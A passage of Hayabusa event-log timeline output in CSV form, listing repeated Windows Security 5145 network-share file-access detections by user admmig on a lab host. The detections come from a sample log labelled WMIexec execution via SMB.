10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.001 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Te3736ca4#\e4a04c178babbb8bb5aaf6d60b47d649 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.017 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Ud0e65fb9# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.017 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Ud0e65fb9#\d90607e7c895999c98edb4043f0073e5 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.017 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.V9921e851# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.032 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.V9921e851#\fab34eeddd8d0d9679cce669b2cff4fe : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.032 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.V4381984f# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.032 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.V4381984f#\1a33211365967c012f504ade4abce1ed : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.032 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Vb0a86591# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.032 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Vb0a86591#\f21bca07e5816f88c1107f51e64caa60 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.048 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Vf4833439# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.048 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Vf4833439#\fb6f372260a08811a4ca7666c60e31e8 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.048 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.VisualC : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.048 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.VisualC\8dd5d48acfdc4ce750166ebe36623926 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.048 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W0bb5dac4# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.048 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W0bb5dac4#\eff9f99a173bfe23d56129e79f85e220 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.063 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W2bac6884# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.063 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W2bac6884#\98fa0075b3677ec2d6a5e980c8c194e2 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.081 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W2d29a719# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.081 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W2d29a719#\b04af69b54fb462c4c632d0f508d617b : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.081 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W2d6979e4# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.081 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W2d6979e4#\b77a61cdfca8e3f67916586b89eb6df5 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.097 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W2ded559f# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.097 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W2ded559f#\2cbdedd1fc5676a39a1fb1b534f48d02 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.097 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W3cdb5602# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.113 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W3cdb5602#\e3e82e97635cdd0d33dd1fb39ffe5b5f : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.113 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W6c95e797# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.113 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W6c95e797#\4bdb448dffd981eb795d0efeaf81aee9 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.113 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W6dcfceb1# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.128 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W6dcfceb1#\bbfc6bc472afc457c523dc2738248629 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.128 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W7b7c0837# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.128 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W7b7c0837#\294124bd4523f5af19788c4942aeba5e : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.128 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W9e7db7c5# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.128 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W9e7db7c5#\e9ab45e2a1806140421e99300db14933 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.144 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W9e8926d3# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.144 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W9e8926d3#\278d9be2765837ed33460677146f35e8 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.144 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W15cd0137# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.144 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W15cd0137#\82f3f76602a3738000b03df08a71ffe8 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.144 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W37d1a032# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.144 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W37d1a032#\d3293b74965baef61a05323c7ec98d92 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.160 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W39c436dd# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.160 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W39c436dd#\711dbd144f8f71a864ea8493a3877bc5 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.160 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W69ef49d2# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.160 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W69ef49d2#\28242ebb69175640e01f44f44845482c : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.191 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W71daf281# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.207 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W71daf281#\be26a3df8bcf20be912896fba8462d2f : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.207 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W81a3882f# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.207 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W81a3882f#\84ae811d9df57eca1c9728263a6e6aff : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.207 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.207 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: USERS : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.207 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Default\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.207 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.207 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.207 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File 
Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Public\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.222 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W708fc392# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.222 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W708fc392#\4f9e41de8acf7fe60bc43242811fbabd : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.222 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W5052cbb1# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.222 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 
